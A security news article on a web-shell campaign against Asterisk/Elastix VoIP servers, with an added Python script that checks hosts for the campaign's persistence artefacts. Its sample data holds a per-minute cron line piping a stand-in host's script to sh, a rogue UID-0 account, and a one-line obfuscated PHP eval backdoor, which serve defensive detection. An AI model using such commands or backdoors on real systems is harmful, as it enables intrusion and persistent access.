VoIP phones using Digium’s software are being targeted to drop a web shell onto their servers as part of an attack campaign designed to exfiltrate data by downloading and executing additional payloads.
“The malware installs multi-layered obfuscated PHP backdoors to the web server’s file system, downloads new payloads to run, and schedules recurring tasks to reinfect the host system,” Palo Alto Networks Unit 42 said in a Friday report.
The unusual activity is said to have started in mid-December 2021 and focuses on Asterisk, a widely used software implementation of a private branch exchange (PBX) running on the open-source Elastix Unified Communications Server.
Unit 42 said the intrusions share similarities with the INJ3CTOR3 campaign disclosed by Israeli cybersecurity firm Check Point in November 2020, citing the possibility that they could be a “revival” of the earlier attacks.
Coinciding with the sudden surge is the public disclosure in December 2021 of a now-patched remote code execution flaw in FreePBX, a web-based open source GUI used to monitor and manage Asterisk. Tracked as CVE-2021-45461, the flaw is rated 9.8 out of 10 in severity.
The attacks begin by fetching a first dropper shell script from a remote server, which in turn installs the PHP web shell in several locations in the file system and creates two root user accounts to maintain remote access.
It further creates a scheduled task that runs every minute and retrieves a fresh copy of the shell script from an attacker-controlled domain for execution.
In addition to taking measures to cover its tracks, the malware is also equipped to execute arbitrary commands, which ultimately allows the attackers to take control of the system and steal information while maintaining a backdoor into the compromised hosts.
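The three persistence artefacts described above (a per-minute cron job that re-fetches a remote script, extra UID-0 accounts, and obfuscated PHP dropped into a web root) are each easy to check for on a host. The script below is an added example, not code from the Unit 42 report or from the Elastix or FreePBX projects; it runs a simple triage over constructed sample inputs (the crontab, passwd and PHP contents, the domain `example.invalid` and the file paths are all made up for illustration) and returns what it finds. On a real system you would feed it the output of `crontab -l` for each user, `/etc/passwd`, and the contents of the PHP files under the web root.

```python
import re

# Constructed sample inputs standing in for the artefacts the report describes.
# None of these values come from the report; they are illustrative only.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * curl -s http://example.invalid/update.sh | sh
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:1001:1001::/var/lib/asterisk:/sbin/nologin
support:x:0:0::/home/support:/bin/bash
"""

SAMPLE_PHP_FILES = {
    "/var/www/html/index.php": "<?php echo 'ok'; ?>",
    "/var/www/html/admin/.cache.php": "<?php eval(base64_decode(str_rot13($_POST['c']))); ?>",
}


def suspicious_cron_entries(crontab_text):
    """Return cron lines that fire every minute and pull a script over HTTP(S)."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)          # five schedule fields + command
        if len(fields) < 6:
            continue
        schedule, command = fields[:5], fields[5]
        every_minute = schedule == ["*"] * 5
        fetches_remote = re.search(r"\b(curl|wget)\b.*https?://", command) is not None
        if every_minute and fetches_remote:
            findings.append(line)
    return findings


def extra_uid0_accounts(passwd_text):
    """Return account names other than 'root' whose UID is 0."""
    names = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            names.append(parts[0])
    return names


# eval()/assert() wrapped around a decoder chain is the classic shape of a
# layered PHP web shell; legitimate application code rarely looks like this.
OBFUSCATION_PATTERN = re.compile(
    r"\b(eval|assert)\s*\(.*\b(base64_decode|str_rot13|gzinflate|gzuncompress)\s*\(",
    re.IGNORECASE | re.DOTALL,
)


def obfuscated_php_files(files):
    """Return paths of PHP files that evaluate decoded/obfuscated payloads."""
    return [path for path, body in files.items() if OBFUSCATION_PATTERN.search(body)]


def triage(crontab_text, passwd_text, php_files):
    """Run all three checks and collect the findings by category."""
    return {
        "cron": suspicious_cron_entries(crontab_text),
        "uid0": extra_uid0_accounts(passwd_text),
        "php": obfuscated_php_files(php_files),
    }


if __name__ == "__main__":
    for kind, items in triage(SAMPLE_CRONTAB, SAMPLE_PASSWD, SAMPLE_PHP_FILES).items():
        for item in items:
            print(f"[{kind}] {item}")
```

Each check is deliberately narrow: a hit from any one of them is a lead for an analyst, not a verdict, and a host that is clean on all three can still be compromised. The value of running them together is that the campaign's persistence relies on all three artefacts at once, so removing only the web shell while leaving the cron job and the extra root accounts in place leads straight to reinfection.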
“The strategy of implanting web shells into vulnerable servers is not a new tactic for malicious actors,” the researchers said.